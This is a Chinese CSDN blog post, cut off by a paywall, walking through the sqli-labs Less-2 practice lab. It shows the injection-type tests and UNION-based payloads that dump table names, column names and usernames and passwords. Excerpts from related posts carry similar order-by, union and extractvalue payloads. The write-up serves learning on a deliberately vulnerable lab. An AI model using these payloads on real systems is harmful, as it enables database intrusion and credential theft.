漫漫SQL lab学习路 less-2篇

最新推荐文章于 2023-05-20 11:52:50 发布
最新推荐文章于 2023-05-20 11:52:50 发布
阅读量327 收藏 1
点赞数
分类专栏: SQL injection_practice 文章标签: SQL injection
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/netsecure/article/details/85929391
版权
在具备less 1的基础后,深入理解SQL注入漏洞。通过?id=1'、1=1及1=2的测试,确认为整数型注入。文章介绍如何爆表名、列名和值,特别探讨了利用extractvalue()函数进行WP的另一种方法,强调了extractvalue()函数的查询限制和substring()的使用场景。
摘要由CSDN通过智能技术生成

less 2:
有了less 1 的基础,我们就直接进入正题
输入?id=1’ 报错
输入?id=1 and 1=1正常显示
输入?id=1 and 1=2 报错
说明这是一个整数型的注入漏洞
有了less 1的铺垫我们就不用order by猜列数了
爆表名:

1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()

在这里插入图片描述
接着爆列名

1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

在这里插入图片描述
爆值

1 and 1=2 union select 1,2,group_concat(username,0x3a,password) from users

在这里插入图片描述

另外一种wp:<

最低0.47元/天 解锁文章
netsecure
关注
专栏目录
sql-libs——less2
bronze_s的博客
10-11 1428
带入执行的SQL语句 $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; 判断列数 http://192.168.0.5:9002/Less-2/?id=1 order by 3 http://192.168.0.5:9002/Less-2/?id=-1 union select 1,2,3 爆表名 http://192.168.0.5:9002/Less-2/?id=-1 union select 1,2,group_concat(table_na
Less-2
weixin_30483495的博客
04-03 98
首先加个单引号来测试一下。 嘿嘿,我还是为了方便把查询语句打印出来了,我们对照上面的查询语句和上一关的截图,可以发现一些规律,但报错信息中只有一个双引号和一个单引号时,这种情况一般是页面没有写引号的。而如果报错信息中出现了一堆双引号加上一个单引号,那么这个就要加上单引号。下面我用我自己写的页面来测试一下。源码如下: 1.php <?php include("sql-...
sql注入系列之Sqli-labs(less-2)
BetsyMyGirl的博客
11-30 1456
判断注入点 http://192.168.81.210/sqli/Less-2/?id=1’输入单引号发现出现了sql语句报错,可以知道单引号已经进入到数据库里执行了,语句类似于 select * from users where id =1' limit 0,1 因为正常的情况下,用户只能将搜索的参数传入到数据库里面进行查询,是不可能去修改查询语句的,上方的报错就是由于用户修改了查询的语句而引起的,将以上语句代入到自己的数据库里执行也是会报错的,因为多了一个单引号。 判断注入类型 输入1 and 1=1
[SQLi-LABS] Less-2
Stan冲冲冲
03-12 104
还是可以用普通注入,但这里用了ExtractValue使报错 /Less-2/?id=1 order by 3 /Less-2/?id=1 and extractvalue(1, concat(0x7e, (select version()),0x7e)) /Less-2/?id=1 and extractvalue(1, concat('~',(select gro...
sqli-labs靶场第二关
gou1791241251的博客
12-19 759
传入id=1查看页面回显 第一步:判断注入类型。如字符型,数值型 传入单引号和双引号,或不传入参数进行测试。在末尾加入–+进行注入sql语句后面的代码 不传入单引号或双引号页面正常 第二步:判断表字段数 使用order by order by 3 时页面正常 order by 4时页面回显异常,所以有三个字段 第三步:使用联合查询获取数据库相关信息与查看页面回显位置 接下来查看数据库名和版本号 接下来通过mysql数据库中的information_schema数据中的tables表来查询所有
班主任心得——漫漫兮,我们携手前进-论文.zip
08-18
班主任心得——漫漫兮,我们携手前进-论文.zip
A股中期策略报告:牛漫漫其修远-0701-国开证券-25页.pdf
07-24
2. **上市公司业绩展望**:预计2019年上半年A股上市公司净利润增速与第一季度相当,但2018年三季度PPI的高基数可能引发同比负增长,营业收入压力增加,预计三季度业绩增速较中报下降,全年业绩保持个位数正增长的...
漫漫其修远---—与中国金融行业血脉相连的三十年信息化之.pdf
11-29
漫漫其修远---—与中国金融行业血脉相连的三十年信息化之.pdf
JP 摩根-全球-宏观策略-离开Libor:前漫漫-5-27页.pdf
最新发布
07-25
《离开Libor:前漫漫》是JP摩根全球宏观策略报告的一部分,主要探讨了全球利率基准改革的背景、政策响应以及市场面临的风险,尤其是随着从LIBOR(伦敦银行间同业拆借利率)向新的替代参考利率转变的全球进程。...
漫漫学习,慢慢坚持中……
kakaxia6337的专栏
02-24 510
付出总有结果,要坚持,要努力。2.23写了从WinMain命令行中提取命令以及修改进程优先级.
Sqli-labs之Less-2
m0_46315342的博客
06-04 446
                                    Less-2   =...
sql-libs less2 详解答案
小白巨白的博客
01-17 579
首先,判断是哪一种的注入类型——整数型错误 127.0.0.1/Less-2/?id=2 当进行注入的时候,由于在添加单引号的时候整体会发生变化,后部分采用注释将其含义进行消除可以发现对应的sql语句应该是 select * from user where id= 参数 所以可以在其后面进行添加和索引 通过group by 1,2,3的参数可以大致知道对应所有的列数,当自动添加到4时产生错误,所以我们应将 数目得到确定为3 当出现错误时,判断哪个错误地方可以进行注入 127.0.0.1/Less-2/?id
Less-2 【数值型】
tubug的博客
05-20 427
到此闯关完成,闯关结束。
SQLi-LABS Less-1&&Less-2
m0_64898960的博客
04-09 303
SQLI-LABS
Sqli-Labs之less-2
ISNS的博客
02-05 973
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~
一个菜鸟的漫漫学习
叫我AC的博客
05-15 113
Java后端一个简单的导出Excel表的工具类 创建工作表 /** * 创建excel文档文件 * @param titleMap 列表头 * @param records 数据 * */ public static Workbook createWorkBook(List<Map<String, Object>> titl...
Sqli 的Less-1和less-2
记录笔记
04-11 241
Less-1 Sqli-2
"互联网改变制造业,电商引领漫漫前行
互联网对制造业电商的影响是一条漫漫其悠远的道。马云曾在十年前预言,互联网将改变生活的方方面面,五年前说不会涉足电子商务,但五年后你会后悔。这预示了互联网与制造业电商的结合将产生深远的影响。 在电商...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值